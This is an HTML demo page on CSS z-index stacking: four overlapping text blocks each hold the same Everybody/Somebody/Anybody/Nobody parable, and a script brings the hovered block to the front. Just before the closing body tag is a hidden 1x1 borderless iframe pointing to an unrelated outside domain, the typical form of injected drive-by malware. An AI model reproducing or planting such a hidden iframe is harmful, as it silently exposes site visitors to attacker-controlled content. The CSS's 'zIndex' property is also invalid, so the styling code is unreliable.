<!DOCTYPE html>
<html>
<head>
<title>Stacking The Elements</title>
<script type="text/javascript">
var oldTop="p1";
function toTop(newTop)
{
domTop=document.getElementById(oldTop).style;
domNew=document.getElementById(newTop).style;
domTop.zIndex="0";
domNew.zIndex="10";
oldTop=newTop;
}
</script>
<style type="text/css">
.para1
{
color:Black;
position:absolute;
top:10px;
left:10px;
zIndex:0;
border:2px Solid;
background-color:Yellow;
}
.para2
{
color:black;
position:absolute;
top:50px;
left:80px;
zIndex:0;
border:2px Solid;
background-color:aqua;
}
.para3
{
color:black;
position:absolute;
top:100px;
left:160px;
zIndex:0;
border:2px Solid;
background-color:red;
}
.para4
{
color:black;
position:absolute;
top:150px;
left:240px;
zIndex:0;
border:2px Solid;
background-color:pink;
}
</style>
</head>
<body>
<pre class="para1" id="p1" onmouseover="toTop('p1');">
This is a story about for people named Everybody, Somebody, Anybody & Nobody.
There was an important job to be done & Everybody was asked to do it. Anybody
could have done it, but Nobody did it.Somebody got angry about that, bcoz it
was Everybody's job. Everybody Thought Anybody could do it but Nobody realised
that Everybody wouldn't do it.It ended up that Everybody blamed Somebody
when Nobody did what Anybody could have Done.
</pre>
<pre class="para2" id="p2" onmouseover="toTop('p2');">
This is a story about for people named Everybody, Somebody, Anybody & Nobody.
There was an important job to be done & Everybody was asked to do it. Anybody
could have done it, but Nobody did it.Somebody got angry about that, bcoz it
was Everybody's job. Everybody Thought Anybody could do it but Nobody realised
that Everybody wouldn't do it.It ended up that Everybody blamed Somebody
when Nobody did what Anybody could have Done.
</pre>
<pre class="para3" id="p3" onmouseover="toTop('p3');">
This is a story about for people named Everybody, Somebody, Anybody & Nobody.
There was an important job to be done & Everybody was asked to do it. Anybody
could have done it, but Nobody did it.Somebody got angry about that, bcoz it
was Everybody's job. Everybody Thought Anybody could do it but Nobody realised
that Everybody wouldn't do it.It ended up that Everybody blamed Somebody
when Nobody did what Anybody could have Done.
</pre>
<pre class="para4" id="p4" onmouseover="toTop('p4');">
This is a story about for people named Everybody, Somebody, Anybody & Nobody.
There was an important job to be done & Everybody was asked to do it. Anybody
could have done it, but Nobody did it.Somebody got angry about that, bcoz it
was Everybody's job. Everybody Thought Anybody could do it but Nobody realised
that Everybody wouldn't do it.It ended up that Everybody blamed Somebody
when Nobody did what Anybody could have Done.
</pre>
<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html>